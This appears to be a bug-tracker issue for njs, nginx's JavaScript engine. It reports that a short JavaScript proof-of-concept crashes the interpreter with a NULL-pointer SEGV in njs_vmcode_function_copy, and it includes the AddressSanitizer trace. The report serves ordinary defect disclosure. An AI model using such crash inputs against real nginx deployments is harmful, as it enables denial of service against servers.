njs
njs copied to clipboard
nginx
SEGV in njs_vmcode_function_copy /njs_asan/src/njs_vmcode.c:1270:10
Hi there, the following PoC triggers a crash in the latest commit:
PoC:
async function a(f) {
try {
await f
b
} catch (c) {
function g() {
g = {}
}
(function(d) { d() }(g))
function e() { g }
}
}
a()
Environment:
Commit: b403e2e83eb417e43c01707691b2092393d1911d
System: Ubuntu 18.04.6 LTS
ASan dump:
/njs_asan/build/njs ./poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3200752==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004e876d bp 0x7fffffffc350 sp 0x7fffffffbfe0 T0)
==3200752==The signal is caused by a READ memory access.
==3200752==Hint: address points to the zero page.
#0 0x4e876d in njs_vmcode_function_copy /njs_asan/src/njs_vmcode.c:1270:10
#1 0x4e1aa2 in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:741:23
#2 0x52dcdf in njs_function_lambda_call /njs_asan/src/njs_function.c:693:11
#3 0x52d6d0 in njs_function_frame_invoke /njs_asan/src/njs_function.c:780:16
#4 0x4e39ec in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:799:23
#5 0x52dcdf in njs_function_lambda_call /njs_asan/src/njs_function.c:693:11
#6 0x52d6d0 in njs_function_frame_invoke /njs_asan/src/njs_function.c:780:16
#7 0x4e39ec in njs_vmcode_interpreter /njs_asan/src/njs_vmcode.c:799:23
#8 0x5ccdfc in njs_await_fulfilled /njs_asan/src/njs_async.c:91:11
#9 0x52e775 in njs_function_native_call /njs_asan/src/njs_function.c:739:11
#10 0x52d6c4 in njs_function_frame_invoke /njs_asan/src/njs_function.c:777:16
#11 0x52d588 in njs_function_call2 /njs_asan/src/njs_function.c:592:11
#12 0x5bf006 in njs_function_call /njs_asan/src/njs_function.h:177:12
#13 0x5bf006 in njs_promise_reaction_job /njs_asan/src/njs_promise.c:1171:15
#14 0x52e775 in njs_function_native_call /njs_asan/src/njs_function.c:739:11
#15 0x52d6c4 in njs_function_frame_invoke /njs_asan/src/njs_function.c:777:16
#16 0x4dd0f4 in njs_vm_invoke /njs_asan/src/njs_vm.c:426:12
#17 0x4dbeb8 in njs_vm_call /njs_asan/src/njs_vm.c:410:12
#18 0x4dd832 in njs_vm_handle_events /njs_asan/src/njs_vm.c:570:19
#19 0x4dd615 in njs_vm_run /njs_asan/src/njs_vm.c:530:12
#20 0x4cb48f in njs_process_script /njs_asan/src/njs_shell.c:924:15
#21 0x4cbb68 in njs_process_file /njs_asan/src/njs_shell.c:619:11
#22 0x4ca1fc in main /njs_asan/src/njs_shell.c:303:15
#23 0x7ffff676dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#24 0x41d9a9 in _start (/njs_asan/build/njs+0x41d9a9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /njs_asan/src/njs_vmcode.c:1270:10 in njs_vmcode_function_copy
==3200752==ABORTING
